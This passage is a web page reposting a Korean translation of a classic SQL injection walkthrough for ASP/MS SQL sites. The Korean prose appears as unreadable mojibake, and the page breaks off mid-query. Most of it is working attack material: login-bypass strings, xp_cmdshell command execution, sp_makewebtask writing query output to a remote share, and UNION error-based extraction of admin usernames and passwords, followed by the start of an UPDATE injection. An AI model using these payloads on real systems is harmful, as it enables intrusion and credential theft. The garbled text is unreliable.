BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: SQL SQL Injection ±âº» Á¶È¸¼ö: 122956


¸µÅ© http://devdev.tistory.com/67 [160]

ÀÌ ¹®¼­´Â Ãʺ¸Àڵ鿡°Ô ¸¹Àº µµ¿òÀÌ µÉ°ÍÀÌ´Ù.
SQL Injection Å×Å©´ÐµéÀ» ÅëÇؼ­ ¹®Á¦¸¦ ÇØ°á ÇÏ·Á°í ³ë·ÂÇÏ°í, ±×°ÍµéÀ» ¼º°øÀûÀ¸·Î ÀÌ¿ëÇϱ⸦ ¿øÇÏ°í, ¶ÇÇÑ ±×·¯ÇÑ °ø°ÝÀ¸·Îº¸ÅÍ ÀÚ½ÅÀ» ¹æ¾îÇÏ°íÀÚ ÇÏ´Â ........

Details
1.0 Introduction
============================================
¼­ ¹ö°¡ ´ÜÁö 80Æ÷Æ®¸¸À» ¿ÀÇÂÇÏ°í ÀÖÀ»¶§, ´ç½ÅÀÇ ¹ÏÀ½Á÷ÇÑ Ãë¾àÁ¡ ½ºÄ³³Ê´Â À¯¿ëÇÑ Á¤º¸¸¦ Àâ¾Æ³»Áö ¸øÇÑ´Ù.
´ç½Åµµ ¾Ë´Ù½ÃÇÇ °ü¸®ÀÚ´Â Ç×»ó ¼­¹ö¸¦ ÆÐÄ¡ÇÑ´Ù.
¿ì¸®´Â À¥ÇØÅ·À¸·Î °üÁ¡À» µ¹·Á¾ß ÇÑ´Ù.
SQL injectionÀº ´ÜÁö 80¹ø Æ÷Æ®¸¸À» ÇÊ¿ä·Î ÇÏ´Â À¥ÇØÅ·ÀÇ ¹æ¹ýÁß ÇÑ°¡ÁöÀÌ´Ù. ¸¸ÀÏ °ü¸®ÀÚ°¡ ÆÐÄ¡¸¦ Àß ÇÏ°í ÀÖÀ»Áö¶óµµ ÇØÅ·Àº Àß ÀÛµ¿ÇÏ°Ô µÉ°ÍÀÌ´Ù.
SQL injection ´Â OS »ó¿¡¼­ À¥¼­¹ö³ª ¼­ºñ½º°¡ ½ÇÇàµÇ°í ÀÖ´Ù°í ÇÒÁö¶óµµ À¥ ¾îÇø®ÄÉÀ̼Ç(like ASP, JSP, PHP, CGI, etc) »ó¿¡¼­ À¥¾îÇø®ÄÉÀÌ¼Ç ±×ÀÚü¸¦ °ø°ÝÇÑ´Ù.

ÀÌ ¹®¼­´Â »õ·ÎÀº °Í¿¡ ´ëÇؼ­ ¸»ÇÏ°í ÀÖÁö´Â ¾Ê´Ù.
SQL injection¿¡ °üÇÑ ¹®¼­´Â ¿©·¯»ç¶÷µéÀÌ ½á ¿Ô°í ³Î¸® »ç¿ëµÇ¾îÁö°í ÀÖ´Ù.
¿ì¸®´Â À̹®¼­¸¦ ÀÛ¼ºÇß´Ù. Á÷Á¢ ¼ö±â·Î ÀÛ¼ºÇÑ SQL injection ÀÇ ¸î°¡Áö¸¦ ¹®¼­È­ Çϱâ À§Çؼ­ ±×¸®°í ´Ù¸¥»ç¶÷µé¿¡°Ô À̹®¼­°¡ µµ¿ò¿¡ µÇ±â¸¦ ¹Ù¶ó±â ¶§¹®ÀÌ´Ù.
´ç½ÅÀº ÇÑ µÎ°¡Áö¸¦ ´õ ¹ß°ßÇÒ¼ö ÀÖÀ» °ÍÀÌ´Ù.
±×·¯±â À§Çؼ­ "9.0 Where can I get more info?"¸¦ È®ÀÎÇØ º½À¸·Î½á SQL injection ¾È¿¡¼­ ¸¹Àº Å×Å©´ÐµéÀ» °³¹ßÇÒ¼ö ÀÖ´Â ¹ÏÀ»¸¸ÇÑ ¸¹Àº Á¤º¸µéÀ» ¾òÀ»¼ö ÀÖÀ» °ÍÀÌ´Ù.


1.1 What is SQL Injection?
-------------------------------------------------------------------------
SQL injection Àº À¥ ÆäÀÌÁö¸¦ ÅëÇؼ­ ÀÔ·ÂÇÏ´Â °Íó·³ SQL query/command¸¦ »ðÀÔÇϱâÀ§ÇÑ Æ®¸¯ÀÌ´Ù.
¸¹Àº À¥ÆäÀÌÁöµéÀº À¥ »ç¿ëÀÚ·Î ºÎÅÍ Æз¯¹ÌÅ͵éÀ» ÀÔ·Â¹Þ¾Æ µ¥ÀÌŸº£À̽º¿¡´ëÇÑ SQL query¸¦ ¸¸µç´Ù.
»ç¿ëÀÚ°¡ ·Î±äÀ» ÇÒ¶§¸¦ ¿¹¸¦ µéÀÚ¸é, »ç¿ëÀÚ°¡ À¯È¿ÇÑ À̸§°ú Æнº¿öµå¸¦ »ç¿ëÇÏ´ÂÁö¸¦ È®ÀÎÇϱâÀ§Çؼ­ »ç¿ëÀÚ À̸§°ú Æнº¿öµå¸¦ ¿¡ °üÇÑ SQL query ¸¦ ¸¸µç´Ù.
SQL injection¸¦ ÅëÇؼ­, Á¤»óÀûÀÎ SQL query¸¦ º¯Á¶ÇÏ°Ô ÇÏ´Â ±³È°ÇÏ°Ô Á¶ÀÛµÈ »ç¿ëÀÚ À̸§°ú Æнº¿öµå¸¦ º¸³»´Â °ÍÀÌ °¡´ÉÇÏ°í ¿ì¸®´Â ÀÌ°ÍÀ» ÅëÇؼ­ ¾î¶²°ÍÀ» ÇàÇÏ°Ô ÇÒ¼ö°¡ ÀÖ´Â °ÍÀÌ´Ù.

1.2 What do you need?
-------------------------------------------------------------------------
¾î¶² ºê¶ó¿ìÀú¶óµµ ÁÁ´Ù.


2.0 What you should look for?
============================================
µ¥ ÀÌŸ ÀÔ·ÂÀ» Çã¶ôÇÏ´Â À¥ÆäÀÌÁö¸¦ ªO¾Æ º¸¾Æ¶ó.
¿¹¸¦ µéÀÚ¸é ·Î±ä À¥ ÆäÀÌÁö, ¼­Ä¡ À¥ÆäÀÌÁö, Çǵå¹é µîµî. ÀÚÁÖ HTML ÆäÀÌÁö´Â ´Ù¸¥ ASP ÆäÀÌÁ¦ Æз¯¹ÌÅ͸¦ º¸³×±â À§Çؼ­ POST ¸í·ÉÀ» »ç¿ëÇÑ´Ù.
ÇÏÁö¸¸ ´ç½ÅÀº URL ¿¡¼­ Æз¯¹ÌÅ͸¦ º¼¼ö´Â ¾øÀ» °ÍÀÌ´Ù.
±×·¯³ª HTMLÀÇ ¼Ò½º Äڵ带 È®ÀÎÇØ º¸¸é HTML Äڵ忡¼­ "FORM" ű׸¦ ¹ß°ß ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.
´ç½ÅÀº ÀÌ HTML Äڵ忡¼­ ´ÙÀ½°ú °°Àº °ÍÀ» ¹ß°ß ÇÒ ¼ö°¡ ÀÖÀ» °ÍÀÌ´Ù.



2.1 What if you can't find any page that takes input?
-------------------------------------------------------------------------
ASP, JSP, CGI, or PHP °°Àº À¥ ÆäÀÌÁöµéÀ» ªO¾Æ º¸±â ¹Ù¶õ´Ù. ƯÈ÷ ´ÙÀ½°ú °°Àº Æз¯¹ÌÅ͸¦ °¡Áö°í ÀÖ´Â URLÀ» ªO¾Æ º¸°Å¶ó. ´ÙÀ½:

http://duck/index.asp?id=10



3.0 How do you test if it is vulnerable?
============================================
½Ì±Û ÄõÆ®(') Æ®¸¯À¸·Î ½ÃÀÛÇØ º¸ÀÚ!
´ÙÀ½°ú °°ÀÌ ÀÔ·ÂÇØ º¸°Å¶ó.:

hi' or 1=1--

´ÙÀ½ ¿¹¿Í °°ÀÌ ·Î±ä, Æнº¿öµå ¶Ç´Â URL ¿¡¼­ ¸»ÀÌ´Ù.
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

¸¸ÀÏ È÷µç Çʵå¿Í °°ÀÌ À̰͵éÀ» ½ÇÇàÇØ¾ß ÇÑ´Ù¸é »çÀÌÆ®·Î º¸ÅÍ HTML ¼Ò½º¸¦ ´Ù¿î·Îµå ¹Þ°í, ´ç½ÅÀÇ ÇÏµå µð½ºÅ©¿¡ ÀúÀåÇÏ°í, Àû´çÇÏ°Ô URL °ú È÷µç Çʵ带 ¼öÁ¤Ç϶ó. ¿¹¸¦ µéÀÚ¸é :
¿îÀÌ ÁÁ´Ù¸é ·Î±ä ³×ÀÓÀ̳ª Æнº¿öµå ¾øÀÌ ·Î±ä ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.

3.1 But why ' or 1=1--?
-------------------------------------------------------------------------
' or 1=1-- °¡ ¿Ö Áß¿äÇÑÁö¿¡ ´ëÇؼ­ ´Ù¸¥ ¿¹Á¦¸¦ ¾Ë¾Æ º¸µµ·Ï ÇÏÀÚ.
·Î±äÀ» ¹Ù·Î Åë°ú ÇÏ´Â °Í¿Ü¿¡ ÀϹÝÀûÀ¸·Î °¡´ÉÇÑ°ÍÀº ¾Æ´ÏÁö¸¸ ¶Ç´Ù¸¥ °¡´É¼ºÀº ¿¢½ºÆ®¶ó ÀÎÆ÷¸ÞÀÌ¼Ç Áï ºÎ¼öÀûÀÎ Á¤º¸¸¦ º¸´Â °ÍÀÌ °¡´ÉÇÏ´Ù´Â °ÍÀÌ´Ù.
´ÙÀ½ URL °ú °°ÀÌ ´ç½ÅÀ» ´Ù¸¥ ÆäÀÌÁö·Î ¸µÅ©¸¦ ÇØÁÖ´Â asp ÆäÀÌÁö¸¦ º¸ÀÚ :

http://duck/index.asp?category=food

ÀÌ URL¿¡¼­ 'category' ´Â º¯¼öÀÌ°í 'food'´Â º¯¼ö¿¡ ÇÒ´çµÇ¾îÁø º¯¼ö °ªÀÌ´Ù.
ÀÌ¿Í °°Àº ÀÏÀº Çϱâ À§Çؼ­ ASP´Â ´ÙÀ½°ú °°Àº Äڵ带 Æ÷ÇÔÇÏ°í ÀÖÀ» °ÍÀÌ´Ù.
(±×·¸´Ù. ÀÌ°ÍÀº ÀÌ ¹®Á¦¸¦ À§Çؼ­ ¿ì¸®°¡ ¸¸µç ½ÇÁ¦ ÄÚµåÀÌ´Ù.) :

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

º¸´Â ¹Ù¿Í °°ÀÌ ¿ì¸®ÀÇ º¯¼ö´Â v_cat ¾ÈÀ¸·Î µé¾î °¥ °ÍÀÌ°í ±×·¡¼­ SQL ¹®ÀåÀº ´ÙÀ½°ú °°ÀÌ µÉ °ÍÀÌ´Ù.:

SELECT * FROM product WHERE PCategory='food'

Äõ¸®´Â WHERE Á¶°Ç(ÀÌ°æ¿ì 'food')°ú ÀÏÄ¡ÇÏ´Â ÇÑ°³³ª ÇÑ°³ ÀÌ»óÀÇ ÇàÀ» °á°ú·Î ¸®ÅÏÇÑ´Ù.
ÀÌÁ¦ ´ÙÀ½°ú °°ÀÌ URLÀ» ¹Ù²Ù°Ô µÉ °æ¿ì¸¦ ¾Ë¾Æ º¸ÀÚ :

http://duck/index.asp?category=food' or 1=1--

¸¸ÀÏ SQL query ¿¡¼­ º¯¼ö¸¦ ´ÙÀ½°ú °°ÀÌ º¯°æÇÏ°Ô µÇ¸é, ÀÌÁ¦ º¯¼ö v_cat = "food' or 1=1-- " µÇ°í ¿ì¸®´Â ´ÙÀ½°ú °°Àº °á°ú¸¦ ¾òÀ» °ÍÀÌ´Ù:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

Äõ ¸®´Â product Å×À̺í·Î ºÎÅÍ ¸ðµç°ÍÀ» ¼±ÅÃÇÑ´Ù.
PCategory °¡ 'food' ÀÎÁö ¾Æ´ÑÁö¿¡ »ó°ü¾øÀÌ ¸»ÀÌ´Ù ´õºí ´ë½¬("--")´Â MS SQL ¼­¹ö¿¡°Ô Äõ¸®ÀÇ ³ª¸ÓÁö ºÎºÐÀ» ¹«½ÃÇϵµ·Ï ÇÑ´Ù. ¸¶Áö¸·¿¡ ÀÖ´Â ½Ì±Û ÄõÆ®(')¸¦ Á¦°ÅÇÏ´Â ¿ªÇÒÀ» ÇÏ°Ô µÉ °ÍÀÌ´Ù.
Á¾Á¾ ´õºí ´ë½¬(--)´Â ½Ì±Û Çؽ¬(#)·Î ´ëü ÇÒ ¼ö ÀÖ´Ù.

ÇÏÁö¸¸ SQL ¼­¹ö°¡ ¾Æ´Ï°Å³ª Äõ¸®ÀÇ ³ª¸ÓÁö¸¦ °£´ÜÇÏ°Ô ¹«½ÃÇÏ°Ô ÇÒ¼ö°¡ ¾ø´Ù¸é ´ÙÀ½°ú °°ÀÌ ½ÃµµÇØ º¸¶ó:

' or 'a'='a

SQL Äõ¸®´Â ÀÌÁ¦ ´ÙÀ½°ú µÉ °ÍÀÌ´Ù:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

ÀÌÁ¦ µ¿ÀÏÇÑ °á°ú¸¦ µ¹·Á ÁÙ °ÍÀÌ´Ù.

½ÇÁ¦ SQL query ¿¡ µû¶ó¼­ ´ÙÀ½°ú °°Àº °ÍµéÁß¿¡¼­ ÇÑ°³·Î ½Ãµµ Çϱ⠹ٶõ´Ù:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a



4.0 How do I get remote execution with SQL injection?
============================================
¸¸ ÀÏ ÀϹÝÀûÀÎ Àǹ̷μ­ SQL ¸í·ÉÀ» »ðÀÔ ÇÒ¼ö ÀÖ´Ù¸é ¸ðµç SQL query ¸¦ ½ÇÇà ÇÒ¼ö ÀÖÀ» °ÍÀÌ´Ù.
MS SQL ¼­¹ö°¡ À©µµ¿ìÁî ¾È¿¡¼­ °ü¸®ÀÚ Á¢±Ù°ú µ¿µîÇÑ ½Ã½ºÅÛ»ó¿¡ µðÆúÆ® ÀνºÅç·Î ½ÇÇàµÇ°í ÀÖ´Ù.
¿ì¸®´Â ¸®¸ðÆ® ½ÇÇàÀ» ¼öÇàÇϱâ À§Çؼ­ xp_cmdshell ¸¦ ¸¶½ºÅÍ °°ÀÌ ÀúÀåµÈ ÇÁ·Î½ÃÀú¸¦ »ç¿ëÇÒ¼ö ÀÖ´Ù.... :

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

½Ì±Û ÄõÆ®(')°¡ ÀÛµ¿ÇÏÁö ¾ÊÀ¸¸é ´õºí ÄõÆ®(")¸¦ »ç¿ëÇØ º¸¶ó

¼¼ ¹Ì ÄÝ·ÐÀº ÇöÁ¦ SQL query ¸¦ ³¡³ª°Ô ÇÒ°ÍÀÌ°í ±×·¡¼­ ´ç½ÅÀÌ »õ·Î¿î SQL ¸í·ÉÀ» ½ÃÀÛÇÒ ¼ö ÀÖ°Ô ÇÒ°ÍÀÌ´Ù.
¸¸ÀÏ ¼­¹ö·ÎºÎÅÍ ¾î¶² ÆÐŶÀÌ ÀÖ´ÂÁö¸¦ üũÇϱâ À§Çؼ­ ¸í·ÉÀÌ ¼º°øÀûÀ¸·Î ½ÇÇàµÇ¾ú´ÂÁö¸¦ È®ÀÎÇϱâ À§Çؼ­ 10.10.1.2 ·Î ºÎÅÍ ICMP ÆÐŶÀ» ¸®½¼ ÇÒ¼ö ÀÖ´Ù. :

#tcpdump icmp

¸¸ÀÏ ´ç½ÅÀÌ ¼­¹ö·ÎºÎÅÍ ¾Æ¹« ÇÎ(ping) ¿ä±¸ ¹ÞÁö ¸øÇß°í, ÆÛ¹Ì¼Ç ¿¡·¯¸¦ Ç¥½ÃÇÏ´Â ¿¡·¯¸Þ½ÃÁö¸¦ ¹Þ¾Ò´Ù¸é, ÀÌ·¯ÇÑ ÀúÀåµÈ ÇÁ·Î½ÃÀú¿¡ ´ëÇؼ­ °ü¸®ÀÚ°¡ À¥»ç¿ëÀÚÀÇ Á¢±ÙÀ» Á¦ÇÑÇÏ°í ÀÖÀ» °¡´É¼ºÀÌ ÀÖ´Ù.



5.0 How to get output of my SQL query?
============================================
HTML ¾È¿¡ ´ç½ÅÀÇ Äõ¸®¸¦ »ðÀÔÇϱâ À§Çؼ­ sp_makewebtak ¸¦ »ç¿ë ÇÒ ¼ö ÀÖ´Ù:

'; EXEC master..sp_makewebtask "10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

ÇÏÁö¸¸ ŸÄÏ IP ´Â ¸ðµç »ç¶÷ÀÌ °øÀ¯ÇÏ°í ÀÖ´Â °øÀ¯ Æú´õÀ̾î¾ß ÇÑ´Ù.



6.0 How to get data from the database using ODBC error message
============================================
¿ì¸®´Â ¿ì¸®°¡ ¿øÇÏ´Â ´ëºÎºÐÀÇ µ¥ÀÌŸ¸¦ ¾ò±â À§Çؼ­ MS SQL ¼­¹ö¿¡ ÀÇÇؼ­ 󸮵ǾîÁö´Â ¿¡·¯ ¸Þ¼¼Áö·Î ºÎÅÍ Á¤º¸¸¦ »ç¿ë ÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½°ú °°Àº ¹®ÀåÀ» °¡Áö°í ÀÖ´Â ÆäÀÌÁö°¡ ÀÖ´Ù°í ÇÏ°í ¿¹¸¦ µéÀÚ¸é :

http://duck/index.asp?id=10

¿ì¸®´Â µ¥ÀÌŸº£À̽º·Î ºÎÅÍ Á¤¼ö 10 À» ´Ù¸¥ ¹®ÀÚ¿­°ú ÇÔ²² UNION À» ½ÃµµÇÒ °ÍÀÌ´Ù:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

¼­ ¹ö¾È¿¡¼­ ½Ã½ºÅÛ Å×À̺í INFORMATION_SCHEMA.TABLES Àº ¸ðµç Å×ÀÌºí¿¡ °üÇÑ Á¤º¸¸¦ Æ÷ÇÔÇÏ°í ÀÖ´Ù.
TABLE_NAME Çʵå´Â µ¥ÀÌÅͺ£À̽º ¾È¿¡¼­ °¢ Å×À̺íÀÇ À̸§À» ºÐ¸íÈ÷ Æ÷ÇÔÇÏ°í ÀÖ´Ù.
¾Ë´Ù ½ÃÇÇ ±×°ÍÀº Ç×»ó Á¸Á¦ Çϱ⶧¹®¿¡ ¿ì¸®´Â ±×°ÍÀ» ¼±ÅÃÇß´Ù. ¿ì¸®ÀÇ Äõ¸®´Â :

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

ÀÌ °ÍÀº µ¥ÀÌÅͺ£À̽º ¾È¿¡¼­ ù¹ø° Å×À̺íÀ» ¸®ÅÏÇÑ´Ù.
¿ì¸®°¡ ÀÌ ¹®ÀÚ¿­ °ªÀ» Á¤¼ö 10°ú UNION ÇÒ¶§ MS SQL ¼­¹ö´Â ¹®ÀÚ¿­(nvarchar)À» Á¤¼ö·Î º¯È¯À» ½ÃµµÇÒ °ÍÀÌ´Ù.
ÀÌ°ÍÀº ¿ì¸®°¡ nvarcharÀ» int ·Î Àüȯ ÇÒ ¼ö ¾ø´Â °Í ¶§¹®¿¡ ¿¡·¯¸¦ ¹ß»ý ½ÃŲ´Ù.
¼­¹ö´Â ´ÙÀ½ÀÇ ¿¡·¯ ¸Þ½ÃÁö¸¦ Ãâ·ÂÇÒ °ÍÀÌ´Ù:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

¿¡·¯ ¸Þ½ÃÁö´Â ¾î¶² °ªÀÌ Á¤¼ö·Î º¯È¯ µÇ¾îÁú¼ö ¾ø´Ù´Â °ÍÀ» ¾Ë·ÁÁÖ°Ô µÇ¹Ç·Î ¿ì¸®¿¡°Ô ÃæºÐÇÑ °¡Ä¡°¡ ÀÖ´Ù.
ÀÌ°æ¿ì¿¡ ¿ì¸®´Â µ¥ÀÌÅÍ º£À̽º¿¡ Àִ ù¹ø° Å×À̺í À̸§ÀÌ "talbe1" À̶ó´Â °ÍÀ» ¾Ë°Ô µÈ´Ù.

´ÙÀ½ Å×À̺í À̸§À» ¾ò±â À§Çؼ­ ¿ì¸®´Â ´ÙÀ½ Äõ¸®¸¦ »ç¿ë ÇÒ ¼ö ÀÖ´Ù:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

¿ì¸®´Â LIKE Å°¿öµå¸¦ »ç¿ëÇÏ¿© µ¥ÀÌŸ¸¦ Á¶»ç ÇÒ ¼ö ÀÖ´Ù.

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

µ¿µîÇÑ Ç¥½Ã·Î¼­, SQL ¼­¹ö ¾È¿¡¼­ '%25login%25' Àº %login% ó·³ º¸¿©Áú °ÍÀÌ´Ù.
ÀÌ°æ¿ì¿¡ ¿ì¸®´Â "admin_login" °ú ÀÏÄ¡Çϴ ù¹ø° Å×À̺í À̸§À» ¾ò°Ô µÉ°ÍÀÌ´Ù.


6.1 How to mine all column names of a table?
---------------------------------------------------------------------------
¿ì¸®´Â Å×À̺íÀÇ ¸ðµç Ä÷³µéÀÇ À̸§À» ¾Ë±â À§Çؼ­ ´Ù¸¥ À¯¿ëÇÑ Å×À̺í
INFORMATION_SCHEMA.COLUMNS À» »ç¿ë ÇÒ ÀÖ´Ù :

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

ÀÌÁ¦ ù¹ø° Ä®·³ À̸§À» ¾ò°Ô µÇ¾ú°í ´ÙÀ½ Ä÷³ À̸§À» ¾ò±â À§Çؼ­ NOT IN () À» »ç¿ë ÇÒ ¼ö ÀÖ´Ù :

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE
COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

ÀÌ¿Í °°ÀÌ °è¼ÓÇؼ­ ³ª¾Æ°¡¼­ ¿ì¸®´Â ³ª¸ÓÁö Ä®·³ À̸§À» ȹµæ Çß´Ù.
"password", "details". ¿ì¸®´Â À̰͵éÀ» ´ÙÀ½ ¿¡·¯ ¸Þ½ÃÁö¸¦ ¾ò¾úÀ»¶§ ¾Ë¼ö°¡ ÀÖ´Ù :
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE
COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]
ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5


6.2 How to retrieve any data we want?
---------------------------------------------------------------------------
ÀÌÁ¦ ¸î°³ÀÇ Áß¿äÇÑ Å×À̺íµé °ú ±×°ÍµéÀÇ ÄÄ·³µéÀ» È®ÀÎÇغ¸ÀÚ.
¿ì¸®´Â µ¥ÀÌŸº£À̽º·Î ºÎÅÍ ¿ì¸®°¡ ¿øÇÏ´Â Á¤º¸¸¦ ȹµæÇϱâ À§Çؼ­ ¶È°°Àº Å×Å©´ÐÀ» »ç¿ë »ç¿ë ÇÒ ¼ö ÀÖ´Ù.

ÀÌÁ¦, "admin_login" Å×À̺í·Î ºÎÅÍ Ã¹¹ø° login_name À» ¾ò¾îº¸ÀÚ:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

ÀÌÁ¦ ¿ì¸®´Â neo ¶ó´Â ·Î±ä À̸§À» °¡Áö°í ÀÖ´Â admin À¯Àú°¡ ÀÖ´Ù´Â °ÍÀ» ¾Ë¾Ò´Ù.
¸¶Áö¸·À¸·Î µ¥ÀÌÅͺ£ÀÌ·Î ºÎÅÍ neo ÀÇ Æнº¿öµå¸¦ ¾ò±â À§Çؼ­ :

http://duck/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

¿ì¸®´Â ID neo, password m4trix ·Î ·Î±ä ÇÒ ¼ö °¡ ÀÖÀ» °ÍÀÌ´Ù.


6.3 How to get numeric string value?
---------------------------------------------------------------------------
À§¿¡ ¼³¸íÇÑ Å×Å©´Ð¿¡´Â Á¦ÇÑ »çÇ×ÀÌ ÀÖ´Ù.
¸¸ÀÏ ¿ì¸®°¡ À¯È¿ÇÑ ¼ýÀÚ(0-9 »çÀÌ¿¡ ÀÖ´Â ¹®ÀÚ)·Î ±¸¼ºµÈ ÅؽºÆ®¸¦ º¯È¯Çϱ⸦ ½ÃµµÇÑ´Ù¸é ¿ì¸®´Â ¾î¶²ÇÑ ¿¡·¯ ¸Þ½ÃÁöµµ ¾òÀ» ¼ö ¾øÀ» °ÍÀÌ´Ù.
ID trinityÀÎ »ç¿ëÀÚÀÇ Æнº¿öµå 31173 À» ¾ò±â À§ÇÑ ½Ãµµ¸¦ °¡Áö°í ¸»Çغ¸ÀÚ:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password
FROM admin_login where login_name='trinity'--

¿ì ¸®´Â "Page Not Found" ¿¡·¯¸¦ ¾òÀ» °ÍÀÌ´Ù.
Á¤¼ö(ÀÌ°æ¿ì 10)¿Í UNION Çϱâ Àü¿¡ Æнº¿öµå 31173 Àº ¼ýÀÚ·Î º¯È¯µÇ¾îÁú °ÍÀ̱⠶§¹®ÀÌ´Ù.
±×°ÍÀº À¯È¿ÇÑ UNION ¹® À̱⠶§¹®¿¡ SQL ¼­¹ö´Â ODBC ¿¡·¯ ¸Þ½ÃÁö¸¦ Ãâ·ÂÇÏÁö ¾ÊÀ» °ÍÀÌ´Ù.
±×·¡¼­ ¿ì¸®´Â ¾î¶°ÇÑ ¼ýÀÚ ¿£Æ®¸®¸¦ ¹ß°ßÇØ ³¾ ¼ö°¡ ¾ø´Ù.

ÀÌ ¹®Á¦¸¦ ÇØ°áÇϱâ À§Çؼ­, ¿ì¸®´Â º¯È¯ÀÌ È®½ÇÈ÷ ½ÇÆó ÇϷε¶ Çϱâ À§Çؼ­ ¼ýÀÚ ¹®ÀÚ¿­¿¡ ¸î°³ÀÇ ¾ËÆĺªÀ» µ¡ºÙÀÏ ¼ö ÀÖ´Ù.
À̹ø¿¡´Â À§¿¡°Í ´ë½ÅÀÌ ÀÌ Äõ¸®·Î ½Ãµµ¸¦ Çغ¸ÀÚ:

http://duck/index.asp?id=10 UNION SELECT TOP 1
convert(int, password%2b'%20morpheus')
FROM admin_login where login_name='trinity'--

¿ì ¸¥´Â Æнº¿öµå¿¡ ¿ì¸®°¡ ¿øÇÏ´Â ¾î¶² ÅؽºÆ²¸¦ µ¡ºÙÀ̱â À§Çؼ­ ´õÇϱ⠱âÈ£(+,ASSCII code for '+' = 0x2b)¸¦ »ç¿ëÇÑ´Ù.
¿ì¸®´Â '(space)morpheus' ¸¦ ½ÇÁ¦ Æнº¿öµå¿¡ µ¡ºÙÀÏ °ÍÀÌ´Ù.
±×·¡¼­ ¿ì¸®°¡ ¼ýÀÚ ¹®ÀÚ¿­ 31173 À» °¡Áö°í ÀÖ´Ù°í ÇÒ Áö¶óµµ ±×°ÍÀº '31173 morpheus' ÀÌ µÉ °ÍÀÌ´Ù.
¼öÀÛ¾÷À¸·Î convert() ÇÔ¼ö¸¦ È£Ãâ ÇÔÀ¸·Î¼­ '31173 morpheus' À» Á¤¼ö·Î º¯È¯À» ½ÃµµÇغ¸¸é SQL ¼­¹ö´Â EDBC ¿¡·¯ ¸Þ½ÃÁö¸¦ Ãâ·Â ÇÒ °ÍÀÌ´Ù:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

ÀÌÁ¦ ID trinity, Æнº¿öµå 31173 ·Î ·Î±äÀ» ÇÒ ¼ö°¡ ÀÖ´Ù.



7.0 How to update/insert data into the database?
============================================
¿ì ¸®°¡ Å×À̺íÀÇ ¸ðµç Ä®·³ À̸§À» ¼º°øÀûÀ¸·Î ¾ò°ÔµÉ¶§ ¿ì¸®´Â UPDATE ¸í·ÉÀ» »ç¿ëÇϰųª Å×À̺í¾È¿¡ »õ·Î¿î ·¹Äڵ带 »ðÀÔÇϱâ À§Çؼ­ INSERT ¸í·ÉÀ» »ç¿ë ÇÒ ¼ö °¡ ÀÖ´Ù.
¿¹¸¦ µéÀÚ¸é, neo ÀÇ Æнº¿öµå¸¦ º¯°æÇϱâ À§Çؼ­ :

http://duck/index.asp?id=10; UPDATE 'admin_login'
